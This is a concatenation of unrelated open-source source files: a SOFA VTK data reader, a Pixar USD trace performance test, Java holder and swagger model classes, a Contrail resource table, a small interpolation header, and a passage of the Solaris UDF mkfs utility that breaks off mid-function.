* This program is free software; you can redistribute it and/or modify it *
* under the terms of the GNU Lesser General Public License as published by *
* the Free Software Foundation; either version 2.1 of the License, or (at *
* your option) any later version. *
* *
* This program is distributed in the hope that it will be useful, but WITHOUT *
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or *
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License *
* for more details. *
* *
* You should have received a copy of the GNU Lesser General Public License *
* along with this program. If not, see <http://www.gnu.org/licenses/>. *
*******************************************************************************
* Authors: The SOFA Team and external contributors (see Authors.txt) *
* *
* Contact information: <EMAIL> *
******************************************************************************/
#ifndef SOFA_COMPONENT_LOADER_BASEVTKREADER_INL
#define SOFA_COMPONENT_LOADER_BASEVTKREADER_INL
#include <SofaLoader/BaseVTKReader.h>
#include <string>
#include <istream>
#include <fstream>
namespace sofa
{
namespace component
{
namespace loader
{
namespace basevtkreader
{
using std::istringstream ;
using sofa::defaulttype::Vec ;
template<class T>
const void* BaseVTKReader::VTKDataIO<T>::getData()
{
return data;
}
template<class T>
void BaseVTKReader::VTKDataIO<T>::resize(int n)
{
if (dataSize != n)
{
if (data) delete[] data;
data = new T[n];
}
dataSize = n;
}
template<class T>
T BaseVTKReader::VTKDataIO<T>::swapT(T t, int nestedDataSize)
{
T revT;
char* revB = (char*) &revT;
const char* tmpB = (char*) &t;
if (nestedDataSize < 2)
{
for (unsigned int c=0; c<sizeof(T); ++c)
revB[c] = tmpB[sizeof(T)-1-c];
}
else
{
int singleSize = sizeof(T)/nestedDataSize;
for (int i=0; i<nestedDataSize; ++i)
{
for (unsigned int c=0; c<sizeof(T); ++c)
revB[c+i*singleSize] = tmpB[(sizeof(T)-1-c) + i*singleSize];
}
}
return revT;
}
template<class T>
void BaseVTKReader::VTKDataIO<T>::swap()
{
for (int i=0; i<dataSize; ++i)
data[i] = swapT(data[i], nestedDataSize);
}
template<class T>
bool BaseVTKReader::VTKDataIO<T>::read(const string& s, int n, int binary)
{
istringstream iss(s);
return read(iss, n, binary);
}
template<class T>
bool BaseVTKReader::VTKDataIO<T>::read(const string& s, int binary)
{
int n=0;
//compute size itself
if (binary == 0)
{
string::size_type begin = 0;
string::size_type end = s.find(' ', begin);
n=1;
while (end != string::npos)
{
n++;
begin = end + 1;
end = s.find(' ', begin);
}
}
else
{
n = sizeof(s.c_str())/sizeof(T);
}
istringstream iss(s);
return read(iss, n, binary);
}
template<class T>
bool BaseVTKReader::VTKDataIO<T>::read(istream& in, int n, int binary)
{
resize(n);
if (binary)
{
in.read((char*)data, n *sizeof(T));
if (in.eof() || in.bad())
{
resize(0);
return false;
}
if (binary == 2) // swap bytes
{
for (int i=0; i<n; ++i)
{
data[i] = swapT(data[i], nestedDataSize);
}
}
}
else
{
int i = 0;
string line;
while(i < dataSize && !in.eof() && !in.bad())
{
std::getline(in, line);
istringstream ln(line);
while (i < n && ln >> data[i])
++i;
}
if (i < n)
{
resize(0);
return false;
}
}
return true;
}
template<class T>
bool BaseVTKReader::VTKDataIO<T>::write(ofstream& out, int n, int groups, int binary)
{
if (n > dataSize && !data) return false;
if (binary)
{
out.write((char*)data, n * sizeof(T));
}
else
{
if (groups <= 0 || groups > n) groups = n;
for (int i = 0; i < n; ++i)
{
if ((i % groups) > 0)
out << ' ';
out << data[i];
if ((i % groups) == groups-1)
out << '\n';
}
}
if (out.bad())
return false;
return true;
}
template<class T>
BaseData* BaseVTKReader::VTKDataIO<T>::createSofaData()
{
Data<helper::vector<T> >* sdata = new Data<helper::vector<T> >(name.c_str(), true, false);
sdata->setName(name);
helper::vector<T>& sofaData = *sdata->beginEdit();
for (int i=0 ; i<dataSize ; i++)
sofaData.push_back(data[i]);
sdata->endEdit();
return sdata;
}
} // basevtkreader
} // namespace loader
} // namespace component
} // namespace sofa
#endif
|
DougRogers-DigitalFish/USD
|
pxr/base/trace/testenv/testTraceReportPerf.cpp
|
//
// Copyright 2018 Pixar
//
// Licensed under the Apache License, Version 2.0 (the "Apache License")
// with the following modification; you may not use this file except in
// compliance with the Apache License and the following modification to it:
// Section 6. Trademarks. is deleted and replaced with:
//
// 6. Trademarks. This License does not grant permission to use the trade
// names, trademarks, service marks, or product names of the Licensor
// and its affiliates, except as required to comply with Section 4(c) of
// the License and to reproduce the content of the NOTICE file.
//
// You may obtain a copy of the Apache License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the Apache License with the above modification is
// distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
// KIND, either express or implied. See the Apache License for the specific
// language governing permissions and limitations under the Apache License.
//
#include "pxr/base/trace/trace.h"
#include "pxr/base/trace/eventTree.h"
#include "pxr/base/trace/reporter.h"
#include "pxr/base/trace/reporterDataSourceCollector.h"
#include "pxr/base/trace/reporterDataSourceCollection.h"
#include "pxr/base/tf/stopwatch.h"
#include "pxr/base/tf/stringUtils.h"
#include <iostream>
PXR_NAMESPACE_USING_DIRECTIVE
void
WriteStats(FILE *file, const std::string& name, const TfStopwatch &timer)
{
fprintf(
file,
"{'profile':'%s','metric':'time','value':%f,'samples':%zu}\n",
name.c_str(),
timer.GetSeconds(),
timer.GetSampleCount());
}
void Recursion(int N)
{
TRACE_FUNCTION();
if (N <= 1) {
return;
}
Recursion(N-1);
}
std::shared_ptr<TraceCollection>
CreateTrace(int N, int R)
{
std::unique_ptr<TraceReporterDataSourceCollector> dataSrc =
TraceReporterDataSourceCollector::New();
TraceCollector::GetInstance().SetEnabled(true);
TRACE_SCOPE("Test Outer");
for (int i = 0; i < N/R; i++) {
Recursion(R);
}
TraceCollector::GetInstance().SetEnabled(false);
std::shared_ptr<TraceCollection> collection =
dataSrc->ConsumeData()[0];
TraceReporter::GetGlobalReporter()->ClearTree();
return collection;
}
int main(int argc, char* argv[])
{
FILE *statsFile = fopen("perfstats.raw", "w");
TfStopwatch watch;
std::vector<int> recrusionSizes = {1, 2, 10};
std::vector<int> testSizes = {1000000, 10000000, 100000000};
// Take any command line arguments and parse to see if a valid test size
// index was passed. If there are too many arguments or the arguments are
// invalid, they are ignored completely. By default only the first test
// size is run. Larger sizes better stress the system but heavily increase
// runtime and memory consumption.
size_t maxTestSize = 1;
if (argc == 2) {
std::stringstream convert(argv[1]);
size_t tmp;
if (convert >> tmp) {
if (tmp <= testSizes.size() && tmp > 0) {
maxTestSize = tmp;
}
}
}
for (int R : recrusionSizes) {
std::cout << "Recursion depth: " << R << std::endl;
for (size_t i = 0; i < maxTestSize; ++i) {
int size = testSizes[i];
watch.Reset();
watch.Start();
auto collection = CreateTrace(size, R);
watch.Stop();
std::cout << "Create Trace N: " << size << " time: "
<< watch.GetSeconds() << " scopes/msec: "
<< float(size)/watch.GetMilliseconds()
<< std::endl;
auto reporter = TraceReporter::New(
"Test", TraceReporterDataSourceCollection::New(collection));
watch.Reset();
watch.Start();
reporter->UpdateTraceTrees();
watch.Stop();
WriteStats( statsFile,
TfStringPrintf("trace trees R %d N %d", R, size),
watch);
std::cout << "Trace Trees N: " << size << " time: "
<< watch.GetSeconds()
<< " scopes/msec: " << float(size)/watch.GetMilliseconds()
<< std::endl;
}
}
fclose(statsFile);
return 0;
}
|
chingov/Milkomeda
|
Milkomeda/src/main/java/com/github/yizzuide/milkomeda/hydrogen/core/HydrogenHolder.java
|
<reponame>chingov/Milkomeda
package com.github.yizzuide.milkomeda.hydrogen.core;
import com.github.yizzuide.milkomeda.hydrogen.i18n.I18nMessages;
import javax.validation.Validator;
/**
* HydrogenHolder
*
* @author yizzuide
* @since 3.0.0
* Create at 2020/03/26 20:25
*/
public class HydrogenHolder {
/**
* 验证器
*/
private static Validator validator;
/**
* 国际化
*/
private static I18nMessages i18nMessages;
public static void setValidator(Validator validator) {
HydrogenHolder.validator = validator;
}
public static Validator getValidator() {
return validator;
}
public static void setI18nMessages(I18nMessages i18nMessages) {
HydrogenHolder.i18nMessages = i18nMessages;
}
public static I18nMessages getI18nMessages() {
return i18nMessages;
}
}
|
jnpr-pranav/contrail-controller
|
src/vnsw/agent/resource_manager/resource_table.cc
|
<filename>src/vnsw/agent/resource_manager/resource_table.cc
/*
* Copyright (c) 2016 Juniper Networks, Inc. All rights reserved.
*/
#include <boost/uuid/uuid_io.hpp>
#include <cmn/agent_cmn.h>
#include <cmn/agent.h>
#include <resource_manager/resource_manager.h>
#include <resource_manager/resource_table.h>
#include <resource_manager/index_resource.h>
ResourceKey::ResourceKey(ResourceManager *rm, Resource::Type type) :
rm_(rm), dirty_(false),
resource_table_(static_cast<ResourceTable *>(rm->resource_table(type))) {
}
ResourceKey::~ResourceKey() {
}
bool ResourceKey::operator<(const ResourceKey &rhs) const {
return IsLess(rhs);
}
ResourceBackupEndKey::ResourceBackupEndKey(ResourceManager *rm) :
ResourceKey(rm, Resource::INVALID) {
}
ResourceBackupEndKey::~ResourceBackupEndKey() {
}
ResourceData::ResourceData(ResourceManager *rm) :
rm_(rm) {
}
ResourceData::~ResourceData() {
}
ResourceTable::ResourceTable(ResourceManager *rm) : rm_(rm) {
}
ResourceTable::~ResourceTable() {
assert(key_data_map_.size() == 0);
}
void ResourceTable::InsertKey(KeyPtr key, DataPtr data) {
key_data_map_.insert(std::pair<KeyPtr, DataPtr>(key, data));
}
void ResourceTable::DeleteKey(KeyPtr key) {
key_data_map_.erase(key);
}
ResourceTable::DataPtr ResourceTable::FindKeyPtr(KeyPtr key) {
KeyDataMapIter it = key_data_map_.find(key);
if (it == key_data_map_.end()) {
return DataPtr();
}
return (*it).second;
}
ResourceData* ResourceTable::FindKey(KeyPtr key) {
return (FindKeyPtr(key).get());
}
// Walk all the etries remove keys are not usable.
void ResourceTable::FlushStale() {
for (KeyDataMapIter it = key_data_map_.begin();
it != key_data_map_.end();) {
KeyPtr key = it->first;
if (key->dirty()) {
it++;
rm_->Release(key);
} else {
it++;
}
}
}
// Allocate the resource and mark the key usable
ResourceTable::DataPtr ResourceTable::Allocate(KeyPtr key) {
KeyDataMapIter it = key_data_map_.find(key);
ResourceManager::DataPtr data = DataPtr();
if (it == key_data_map_.end()) {
data = AllocateData(key);
InsertKey(key, data);
key->reset_dirty();
} else {
data = (*it).second;
(*it).first->reset_dirty();
}
return data;
}
|
newincpp/GLnewin
|
LunaticPlatypus/Math.hh
|
<reponame>newincpp/GLnewin<filename>LunaticPlatypus/Math.hh<gh_stars>0
#pragma once
#include <cmath>
template<typename T>
T lerp(T a, T b, float f) {
return a + f * (b - a);
}
template<typename T>
T CosineInterpolate(T y1, T y2, float mu) {
return learp<T>(y1, y2, (1-cos(mu*PI))/2);
}
//template<typename T>
//double CubicInterpolate(
// double y0,double y1,
// double y2,double y3,
// double mu)
//{
// double a0,a1,a2,a3,mu2;
//
// mu2 = mu*mu;
// a0 = y3 - y2 - y0 + y1;
// a1 = y0 - y1 - a0;
// a2 = y2 - y0;
// a3 = y1;
//
// return(a0*mu*mu2+a1*mu2+a2*mu+a3);
//}
|
ikechan8370/bhpan-student-group-importer
|
java-client/src/main/java/io/openDocAPI/client/model/FileGetfilecustomattributeResItem.java
|
<filename>java-client/src/main/java/io/openDocAPI/client/model/FileGetfilecustomattributeResItem.java
/*
* 6.0-OpenDoc_API-文档访问
* API to access AnyShare 如有任何疑问,可到开发者社区提问:https://developers.aishu.cn # Authentication - 调用需要鉴权的API,必须将token放在HTTP header中:\"Authorization: Bearer ACCESS_TOKEN\" - 对于GET请求,除了将token放在HTTP header中,也可以将token放在URL query string中:\"tokenid=ACCESS_TOKEN\"
*
* OpenAPI spec version: 6.0.10
*
*
* NOTE: This class is auto generated by the swagger code generator program.
* https://github.com/swagger-api/swagger-codegen.git
* Do not edit the class manually.
*/
package io.openDocAPI.client.model;
import java.util.Objects;
import java.util.Arrays;
import com.google.gson.TypeAdapter;
import com.google.gson.annotations.JsonAdapter;
import com.google.gson.annotations.SerializedName;
import com.google.gson.stream.JsonReader;
import com.google.gson.stream.JsonWriter;
import io.swagger.v3.oas.annotations.media.Schema;
import java.io.IOException;
import java.util.ArrayList;
import java.util.List;
/**
* FileGetfilecustomattributeResItem
*/
@javax.annotation.Generated(value = "io.swagger.codegen.v3.generators.java.JavaClientCodegen", date = "2020-06-28T09:01:49.177Z[Etc/UTC]")
public class FileGetfilecustomattributeResItem {
@SerializedName("id")
private Long id = null;
@SerializedName("name")
private String name = null;
@SerializedName("value")
private Object value = null;
@SerializedName("valueid")
private List<Integer> valueid = null;
@SerializedName("type")
private Long type = null;
public FileGetfilecustomattributeResItem id(Long id) {
this.id = id;
return this;
}
/**
* 属性唯一ID
* @return id
**/
@Schema(required = true, description = "属性唯一ID")
public Long getId() {
return id;
}
public void setId(Long id) {
this.id = id;
}
public FileGetfilecustomattributeResItem name(String name) {
this.name = name;
return this;
}
/**
* 属性名称
* @return name
**/
@Schema(required = true, description = "属性名称")
public String getName() {
return name;
}
public void setName(String name) {
this.name = name;
}
public FileGetfilecustomattributeResItem value(Object value) {
this.value = value;
return this;
}
/**
* 属性值,类型为:string/int/string array type等于1、3时value类型为string,0为string array, 其余均为int 属性值为空时不存在此字段
* @return value
**/
@Schema(description = "属性值,类型为:string/int/string array type等于1、3时value类型为string,0为string array, 其余均为int 属性值为空时不存在此字段 ")
public Object getValue() {
return value;
}
public void setValue(Object value) {
this.value = value;
}
public FileGetfilecustomattributeResItem valueid(List<Integer> valueid) {
this.valueid = valueid;
return this;
}
public FileGetfilecustomattributeResItem addValueidItem(Integer valueidItem) {
if (this.valueid == null) {
this.valueid = new ArrayList<Integer>();
}
this.valueid.add(valueidItem);
return this;
}
/**
* 属性值ID,类型为int/int array type等于0或1时存在。0时是int array
* @return valueid
**/
@Schema(description = "属性值ID,类型为int/int array type等于0或1时存在。0时是int array ")
public List<Integer> getValueid() {
return valueid;
}
public void setValueid(List<Integer> valueid) {
this.valueid = valueid;
}
public FileGetfilecustomattributeResItem type(Long type) {
this.type = type;
return this;
}
/**
* 属性类型 - 0:层级 - 1:枚举 - 2:数字 - 3:文本 - 4:时间 (秒)
* @return type
**/
@Schema(required = true, description = "属性类型 - 0:层级 - 1:枚举 - 2:数字 - 3:文本 - 4:时间 (秒) ")
public Long getType() {
return type;
}
public void setType(Long type) {
this.type = type;
}
@Override
public boolean equals(java.lang.Object o) {
if (this == o) {
return true;
}
if (o == null || getClass() != o.getClass()) {
return false;
}
FileGetfilecustomattributeResItem fileGetfilecustomattributeResItem = (FileGetfilecustomattributeResItem) o;
return Objects.equals(this.id, fileGetfilecustomattributeResItem.id) &&
Objects.equals(this.name, fileGetfilecustomattributeResItem.name) &&
Objects.equals(this.value, fileGetfilecustomattributeResItem.value) &&
Objects.equals(this.valueid, fileGetfilecustomattributeResItem.valueid) &&
Objects.equals(this.type, fileGetfilecustomattributeResItem.type);
}
@Override
public int hashCode() {
return Objects.hash(id, name, value, valueid, type);
}
@Override
public String toString() {
StringBuilder sb = new StringBuilder();
sb.append("class FileGetfilecustomattributeResItem {\n");
sb.append(" id: ").append(toIndentedString(id)).append("\n");
sb.append(" name: ").append(toIndentedString(name)).append("\n");
sb.append(" value: ").append(toIndentedString(value)).append("\n");
sb.append(" valueid: ").append(toIndentedString(valueid)).append("\n");
sb.append(" type: ").append(toIndentedString(type)).append("\n");
sb.append("}");
return sb.toString();
}
/**
* Convert the given object to string with each line indented by 4 spaces
* (except the first line).
*/
private String toIndentedString(java.lang.Object o) {
if (o == null) {
return "null";
}
return o.toString().replace("\n", "\n ");
}
}
|
AsahiOS/gate
|
usr/src/cmd/fs.d/udfs/mkfs/mkfs.c
|
/*
* CDDL HEADER START
*
* The contents of this file are subject to the terms of the
* Common Development and Distribution License (the "License").
* You may not use this file except in compliance with the License.
*
* You can obtain a copy of the license at usr/src/OPENSOLARIS.LICENSE
* or http://www.opensolaris.org/os/licensing.
* See the License for the specific language governing permissions
* and limitations under the License.
*
* When distributing Covered Code, include this CDDL HEADER in each
* file and include the License file at usr/src/OPENSOLARIS.LICENSE.
* If applicable, add the following below this CDDL HEADER, with the
* fields enclosed by brackets "[]" replaced with your own identifying
* information: Portions Copyright [yyyy] [name of copyright owner]
*
* CDDL HEADER END
*/
/*
* Copyright 2009 Sun Microsystems, Inc. All rights reserved.
* Use is subject to license terms.
*/
/* Copyright (c) 1983, 1984, 1985, 1986, 1987, 1988, 1989 AT&T */
/* All Rights Reserved */
/*
* Portions of this source code were derived from Berkeley 4.3 BSD
* under license from the Regents of the University of California.
*/
/*
* make file system for udfs (UDF - ISO13346)
*
* usage:
*
* mkfs [-F FSType] [-V] [-m] [options]
* [-o specific_options] special size
*
* where specific_options are:
* N - no create
* label - volume label
* psize - physical block size
*/
#include <stdio.h>
#include <strings.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <time.h>
#include <locale.h>
#include <fcntl.h>
#include <errno.h>
#include <limits.h>
#include <sys/mnttab.h>
#include <sys/param.h>
#include <sys/types.h>
#include <sys/sysmacros.h>
#include <sys/vnode.h>
#include <sys/mntent.h>
#include <sys/filio.h>
#include <sys/stat.h>
#include <ustat.h>
#include <sys/isa_defs.h> /* for ENDIAN defines */
#include <sys/dkio.h>
#include <sys/fdio.h>
#include <sys/vtoc.h>
#include <sys/fs/udf_volume.h>
extern char *getfullrawname(char *);
extern char *getfullblkname(char *);
extern struct tm *localtime_r(const time_t *, struct tm *);
extern void maketag(struct tag *, struct tag *);
extern int verifytag(struct tag *, uint32_t, struct tag *, int);
extern void setcharspec(struct charspec *, int32_t, uint8_t *);
#define UMASK 0755
#define POWEROF2(num) (((num) & ((num) - 1)) == 0)
#define MB (1024*1024)
/*
* Forward declarations
*/
static void rdfs(daddr_t bno, int size, char *bf);
static void wtfs(daddr_t bno, int size, char *bf);
static void dump_fscmd(char *fsys, int fsi);
static int32_t number(long big, char *param);
static void usage();
static int match(char *s);
static int readvolseq();
static uint32_t get_last_block();
/*
* variables set up by front end.
*/
static int Nflag = 0; /* run mkfs without writing */
/* file system */
static int mflag = 0; /* return the command line used */
/* to create this FS */
static int fssize; /* file system size */
static uint32_t disk_size; /* partition size from VTOC */
static uint32_t unused; /* unused sectors in partition */
static int sectorsize = 2048; /* bytes/sector default */
/* If nothing specified */
static char *fsys;
static int fsi;
static int fso;
#define BIG LONG_MAX
static uint32_t number_flags = 0;
static char *string;
static void setstamp(tstamp_t *);
static void setextad(extent_ad_t *, uint32_t, uint32_t);
static void setdstring(dstring_t *, char *, int32_t);
static void wtvolseq(tag_t *, daddr_t, daddr_t);
static void volseqinit();
static void setstamp(tstamp_t *);
static uint32_t get_bsize();
#define VOLRECSTART (32 * 1024)
#define VOLSEQSTART 128
#define VOLSEQLEN 16
#define INTSEQSTART 192
#define INTSEQLEN 8192
#define FIRSTAVDP 256
#define AVDPLEN 1
#define FILESETLEN 2
#define SPACEMAP_OFF 24
#define MAXID 16
static time_t mkfstime;
static struct tm res;
static long tzone;
static char vsibuf[128];
static regid_t sunmicro = { 0, "*SUN SOLARIS UDF", 4, 2 };
static regid_t lvinfo = { 0, "*UDF LV Info", 0x50, 0x1, 4, 2 };
static regid_t partid = { 0, "+NSR02", 0 };
static regid_t udf_compliant = { 0, "*OSTA UDF Compliant", 0x50, 0x1, 0 };
static uint8_t osta_unicode[] = "OSTA Compressed Unicode";
static int bdevismounted;
static int ismounted;
static int directory;
static char buf[MAXBSIZE];
static char buf2[MAXBSIZE];
static char lvid[MAXBSIZE];
uint32_t ecma_version = 2;
static int serialnum = 1; /* Tag serial number */
static char udfs_label[128] = "*NoLabel*";
static int acctype = PART_ACC_OW;
static uint32_t part_start;
static uint32_t part_len;
static uint32_t part_bmp_bytes;
static uint32_t part_bmp_sectors;
static int32_t part_unalloc = -1;
static uint32_t filesetblock;
/* Set by readvolseq for -m option */
static uint32_t oldfssize;
static char *oldlabel;
int
main(int32_t argc, int8_t *argv[])
{
long i;
FILE *mnttab;
struct mnttab mntp;
char *special, *raw_special;
struct stat statarea;
struct ustat ustatarea;
int32_t c;
uint32_t temp_secsz;
int isfs;
(void) setlocale(LC_ALL, "");
#if !defined(TEXT_DOMAIN)
#define TEXT_DOMAIN "SYS_TEST"
#endif
(void) textdomain(TEXT_DOMAIN);
while ((c = getopt(argc, argv, "F:Vmo:")) != EOF) {
switch (c) {
case 'F':
string = optarg;
if (strcmp(string, "udfs") != 0) {
usage();
}
break;
case 'V':
{
char *opt_text;
int opt_count;
(void) fprintf(stdout,
gettext("mkfs -F udfs "));
for (opt_count = 1; opt_count < argc;
opt_count++) {
opt_text = argv[opt_count];
if (opt_text) {
(void) fprintf(stdout,
" %s ", opt_text);
}
}
(void) fprintf(stdout, "\n");
}
break;
case 'm':
/*
* return command line used
* to create this FS
*/
mflag++;
break;
case 'o':
/*
* udfs specific options.
*/
string = optarg;
while (*string != '\0') {
if (match("N")) {
Nflag++;
} else if (match("psize=")) {
number_flags = 0;
sectorsize = number(BIG,
"psize");
} else if (match("label=")) {
for (i = 0; i < 31; i++) {
if (*string == '\0') {
break;
}
udfs_label[i] =
*string++;
}
udfs_label[i] = '\0';
} else if (*string == '\0') {
break;
} else {
(void) fprintf(stdout,
gettext("illegal "
"option: %s\n"),
string);
usage();
}
if (*string == ',') {
string++;
}
if (*string == ' ') {
string++;
}
}
break;
case '?':
usage();
break;
}
}
(void) time(&mkfstime);
if (optind > (argc - 1)) {
usage();
}
argc -= optind;
argv = &argv[optind];
fsys = argv[0];
raw_special = getfullrawname(fsys);
fsi = open(raw_special, 0);
if (fsi < 0) {
(void) fprintf(stdout,
gettext("%s: cannot open\n"), fsys);
exit(32);
}
fso = fsi;
if ((temp_secsz = get_bsize()) != 0) {
sectorsize = temp_secsz;
}
/* Get old file system information */
isfs = readvolseq();
if (mflag) {
/*
* Figure out the block size and
* file system size and print the information
*/
if (isfs)
dump_fscmd(fsys, fsi);
else
(void) printf(gettext(
"[not currently a valid file system]\n"));
exit(0);
}
/*
* Get the disk size from the drive or VTOC for the N and N-256
* AVDPs and to make sure we don't want to create a file system
* bigger than the partition.
*/
disk_size = get_last_block();
if (argc < 2 && disk_size == 0 || argc < 1) {
usage();
}
if (argc < 2) {
(void) printf(gettext("No size specified, entire partition "
"of %u sectors used\n"), disk_size);
fssize = disk_size;
} else {
string = argv[1];
number_flags = 0;
fssize = number(BIG, "size");
}
if (fssize < 0) {
(void) fprintf(stderr,
gettext("Negative number of sectors(%d) not allowed\n"),
fssize);
exit(32);
}
if (fssize < (512 * sectorsize / DEV_BSIZE)) {
(void) fprintf(stdout,
gettext("size should be at least %d sectors\n"),
(512 * sectorsize / DEV_BSIZE));
exit(32);
}
if (disk_size != 0) {
if (fssize > disk_size) {
(void) fprintf(stderr, gettext("Invalid size: %d "
"larger than the partition size\n"), fssize);
exit(32);
} else if (fssize < disk_size) {
unused = disk_size - fssize;
(void) printf(
gettext("File system size %d smaller than "
"partition, %u sectors unused\n"),
fssize, unused);
}
} else {
/* Use passed-in size */
disk_size = fssize;
}
if (!Nflag) {
special = getfullblkname(fsys);
/*
* If we found the block device name,
* then check the mount table.
* if mounted, write lock the file system
*
*/
if ((special != NULL) && (*special != '\0')) {
mnttab = fopen(MNTTAB, "r");
while ((getmntent(mnttab, &mntp)) == 0) {
if (strcmp(special, mntp.mnt_special) == 0) {
(void) fprintf(stdout,
gettext("%s is mounted,"
" can't mkfs\n"), special);
exit(32);
}
}
(void) fclose(mnttab);
}
if ((bdevismounted) && (ismounted == 0)) {
(void) fprintf(stdout,
gettext("can't check mount point; "));
(void) fprintf(stdout,
gettext("%s is mounted but not in mnttab(4)\n"),
special);
exit(32);
}
if (directory) {
if (ismounted == 0) {
(void) fprintf(stdout,
gettext("%s is not mounted\n"),
special);
exit(32);
}
}
fso = creat(fsys, 0666);
if (fso < 0) {
(void) fprintf(stdout,
gettext("%s: cannot create\n"), fsys);
exit(32);
}
if (stat(fsys, &statarea) < 0) {
(void) fprintf(stderr,
gettext("%s: %s: cannot stat\n"),
argv[0], fsys);
exit(32);
}
if (ustat(statarea.st_rdev, &ustatarea) >= 0) {
(void) fprintf(stderr,
gettext("%s is mounted, can't mkfs\n"), fsys);
exit(32);
}
} else {
/*
* For the -N case, a file descriptor is needed for the llseek()
* in wtfs(). See the comment in wtfs() for more information.
*
* Get a file descriptor that's read-only so that this code
* doesn't accidentally write to the file.
*/
fso = open(fsys, O_RDONLY);
if (fso < 0) {
(void) fprintf(stderr, gettext("%s: cannot open\n"),
fsys);
exit(32);
}
}
/*
* Validate the given file system size.
* Verify that its last block can actually be accessed.
*/
fssize = fssize / (sectorsize / DEV_BSIZE);
if (fssize <= 0) {
(void) fprintf(stdout,
gettext("preposterous size %d. sectors\n"), fssize);
exit(32);
}
fssize --;
/*
* verify device size
*/
rdfs(fssize - 1, sectorsize, buf);
if ((sectorsize < DEV_BSIZE) ||
(sectorsize > MAXBSIZE)) {
(void) fprintf(stdout,
gettext("sector size must be"
" between 512, 8192 bytes\n"));
}
if (!POWEROF2(sectorsize)) {
(void) fprintf(stdout,
gettext("sector size must be a power of 2, not %d\n"),
sectorsize);
exit(32);
}
if (Nflag) {
exit(0);
}
(void) printf(gettext("Creating file system with sector size of "
"%d bytes\n"), sectorsize);
/*
* Set up time stamp values
*/
mkfstime = time(0);
(void) localtime_r(&mkfstime, &res);
if (res.tm_isdst > 0) {
tzone = altzone / 60;
} else if (res.tm_isdst == 0) {
tzone = tzone / 60;
} else {
tzone = 2047; /* Unknown */
}
/*
* Initialize the volume recognition sequence, the volume descriptor
* sequences and the anchor pointer.
*/
volseqinit();
(void) fsync(fso);
(void) close(fsi);
(void) close(fso);
return (0);
}
static void
setstamp(tstamp_t *tp)
{
tp->ts_usec = 0;
tp->ts_husec = 0;
tp->ts_csec = 0;
tp->ts_sec = res.tm_sec;
tp->ts_min = res.tm_min;
tp->ts_hour = res.tm_hour;
tp->ts_day = res.tm_mday;
tp->ts_month = res.tm_mon + 1;
tp->ts_year = 1900 + res.tm_year;
tp->ts_tzone = 0x1000 + (-tzone & 0xFFF);
}
static void
setextad(extent_ad_t *eap, uint32_t len, uint32_t loc)
{
eap->ext_len = len;
eap->ext_loc = loc;
}
static void
setdstring(dstring_t *dp, char *cp, int len)
{
int32_t length;
bzero(dp, len);
length = strlen(cp);
if (length > len - 3) {
length = len - 3;
}
dp[len - 1] = length + 1;
*dp++ = 8;
(void) strncpy(dp, cp, len-2);
}
static void
wtvolseq(tag_t *tp, daddr_t blk1, daddr_t blk2)
{
static uint32_t vdsn = 0;
tp->tag_loc = blk1;
switch (tp->tag_id) {
case UD_PRI_VOL_DESC :
((struct pri_vol_desc *)tp)->pvd_vdsn = vdsn++;
break;
case UD_VOL_DESC_PTR :
((struct vol_desc_ptr *)tp)->vdp_vdsn = vdsn++;
break;
case UD_IMPL_USE_DESC :
((struct iuvd_desc *)tp)->iuvd_vdsn = vdsn++;
break;
case UD_PART_DESC :
((struct part_desc *)tp)->pd_vdsn = vdsn++;
break;
case UD_LOG_VOL_DESC :
((struct log_vol_desc *)tp)->lvd_vdsn = vdsn++;
break;
case UD_UNALL_SPA_DESC :
((struct unall_spc_desc *)tp)->ua_vdsn = vdsn++;
break;
}
bzero(buf2, sectorsize);
/* LINTED */
maketag(tp, (struct tag *)buf2);
/*
* Write at Main Volume Descriptor Sequence
*/
wtfs(blk1, sectorsize, buf2);
tp->tag_loc = blk2;
switch (tp->tag_id) {
case UD_PRI_VOL_DESC :
((struct pri_vol_desc *)tp)->pvd_vdsn = vdsn++;
break;
case UD_VOL_DESC_PTR :
((struct vol_desc_ptr *)tp)->vdp_vdsn = vdsn++;
break;
case UD_IMPL_USE_DESC :
((struct iuvd_desc *)tp)->iuvd_vdsn = vdsn++;
break;
case UD_PART_DESC :
((struct part_desc *)tp)->pd_vdsn = vdsn++;
break;
case UD_LOG_VOL_DESC :
((struct log_vol_desc *)tp)->lvd_vdsn = vdsn++;
break;
case UD_UNALL_SPA_DESC :
((struct unall_spc_desc *)tp)->ua_vdsn = vdsn++;
break;
}
maketag(tp, tp);
/*
* Write at Reserve Volume Descriptor Sequence
*/
wtfs(blk2, sectorsize, buf);
}
static void
volseqinit()
{
struct tag *tp;
struct nsr_desc *nsp;
struct pri_vol_desc *pvdp;
struct iuvd_desc *iudp;
struct part_desc *pp;
struct phdr_desc *php;
struct log_vol_desc *lvp;
long_ad_t *lap;
struct pmap_typ1 *pmp;
struct unall_spc_desc *uap;
struct log_vol_int_desc *lvip;
struct term_desc *tdp;
struct anch_vol_desc_ptr *avp;
struct lvid_iu *lviup;
struct file_set_desc *fsp;
struct file_entry *fp;
struct icb_tag *icb;
struct short_ad *sap;
struct file_id *fip;
struct space_bmap_desc *sbp;
uint8_t *cp;
daddr_t nextblock, endblock;
int32_t volseq_sectors, nextlogblock, rootfelen, i;
uint32_t mvds_loc, rvds_loc;
bzero(buf, MAXBSIZE);
/*
* Starting from MAXBSIZE, clear out till 256 sectors.
*/
for (i = MAXBSIZE / sectorsize; i < FIRSTAVDP; i++) {
wtfs(i, sectorsize, buf);
}
/* Zero out the avdp at N - 257 */
wtfs(fssize - 256, sectorsize, buf);
/*
* Leave 1st 32K for O.S.
*/
nextblock = VOLRECSTART / sectorsize;
/*
* Write BEA01/NSR02/TEA01 sequence.
* Each one must be 2K bytes in length.
*/
nsp = (struct nsr_desc *)buf;
nsp->nsr_str_type = 0;
nsp->nsr_ver = 1;
(void) strncpy((int8_t *)nsp->nsr_id, "BEA01", 5);
nsp = (struct nsr_desc *)&buf[2048];
nsp->nsr_str_type = 0;
nsp->nsr_ver = 1;
(void) strncpy((int8_t *)nsp->nsr_id, "NSR02", 5);
nsp = (struct nsr_desc *)&buf[4096];
nsp->nsr_str_type = 0;
nsp->nsr_ver = 1;
